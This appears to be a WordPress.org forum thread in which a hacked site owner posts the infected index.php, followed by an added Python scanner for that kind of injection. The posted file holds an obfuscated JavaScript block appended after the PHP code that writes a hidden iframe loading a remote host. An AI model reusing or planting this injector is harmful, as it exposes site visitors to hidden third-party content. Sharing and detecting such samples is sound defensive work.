WordPress.org

Hacked WordPress (3 posts)

  1. anjuz
    Member
    Posted 6 years ago #

    Hi,

    I was using WordPress 2.6.2 and my site got hacked. I have since upgraded to 2.7.1 and believe that I have cleaned it all up now.

    This is what someone put into all of my index.php files:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><!-- ad --><script>
    uyimh=687;
    qxcxg=4804;
    ddytx=7948;
    xkjpv="write";
    mzsrv="me";
    zqfqw="et";
    gdtrk="/' st";
    rpiia="yl";
    qxaol="";
    ldlvw="i";
    zfhuu="ty";
    hvkhb=":h";
    hbqmm="d";
    hauzn="";
    zdqdp=4;
    sjgbi="if";
    rpygo="r";
    syjnh=" sr";
    rwanv="c";
    elujl="=";
    hrgnc=863;
    akzpp=8853;
    tplxn=" ";
    cvtot="</";
    qtndm="";
    jlooz=3953;
    uyimh=687;
    qxcxg=4804;
    ddytx=7948;
    xkjpv="write";
    mzsrv="me";
    zqfqw="et";
    gdtrk="/' st";
    rpiia="yl";
    qxaol="";
    ldlvw="i";
    zfhuu="ty";
    hvkhb=":h";
    hbqmm="d";
    hauzn="";
    zdqdp=4;
    sjgbi="if";
    rpygo="r";
    syjnh=" sr";
    rwanv="c";
    elujl="=";
    hrgnc=863;
    akzpp=8853;
    tplxn=" ";
    cvtot="</";
    qtndm="";
    jlooz=3953;
    gftzo=(9.007e3>=5e1?uyimh:qxcxg);
    jjaqh=(ddytx>.2438?xkjpv:3.);
    gmbpt=(7.3e1>=36?mzsrv:.45);
    zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
    hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
    rmtyf=(6.5e1,"");
    
    aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->
  2. anjuz
    Member
    Posted 6 years ago #

    OK, the hacker did the same thing again.

    This code above loads some hidden ad system, but I can't be bothered figuring out what that JavaScript really points to.

    I'm wiping out everything and starting a fresh install.

  3. whooami
    Member
    Posted 6 years ago #

    Delete ALL the files.

Topic Closed

This topic has been closed to new replies.
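
A check for the kind of injection shown in the first post, as an added example that is not part of the original thread: it inspects whatever follows the final `?>` in each index.php and flags script or iframe markup and runs of tiny string assignments. The function names, the threshold of 10 and both sample files are constructed for illustration.

```python
import re
from pathlib import Path

SCRIPT_OR_FRAME = re.compile(r"<\s*(script|iframe)\b", re.I)
# Trait of the posted payload: many short `name="xx";` / `name=123;` lines
# that are concatenated later. The pattern itself is an assumption.
SHORT_ASSIGN = re.compile(r'^\s*[a-z]{4,6}\s*=\s*(?:"[^"]{0,6}"|[\d.]+)\s*;\s*$', re.M)

# Constructed samples (not taken from a real site).
CLEAN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n?>\n"
INFECTED = (CLEAN.rstrip("\n") + "<!-- ad --><script>\n"
            + "".join(f'qz{c}xy="{c}";\n' for c in "abcdefghijkl")
            + "</script><!-- /ad -->")

def trailing_output(php_source):
    """Return the text after the final '?>' ('' if PHP is never closed)."""
    idx = php_source.rfind("?>")
    return "" if idx == -1 else php_source[idx + 2:]

def findings(php_source):
    """List the suspicious traits found after the last PHP closing tag."""
    tail = trailing_output(php_source)
    found = []
    # Weak signal alone: theme templates may end with plain HTML.
    if tail.strip():
        found.append("content-after-closing-tag")
    # Strong signal: the core index.php emits no markup of its own.
    if SCRIPT_OR_FRAME.search(tail):
        found.append("script-or-iframe-after-closing-tag")
    if len(SHORT_ASSIGN.findall(tail)) >= 10:
        found.append("fragmented-string-assignments")
    return found

def scan_tree(root):
    """Map every index.php under root that has findings to those findings."""
    report = {}
    for path in Path(root).rglob("index.php"):
        hits = findings(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

if __name__ == "__main__":
    import sys
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, ", ".join(hits))
```

A clean result only covers files named index.php; it says nothing about other modified files or about how the attacker got write access.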
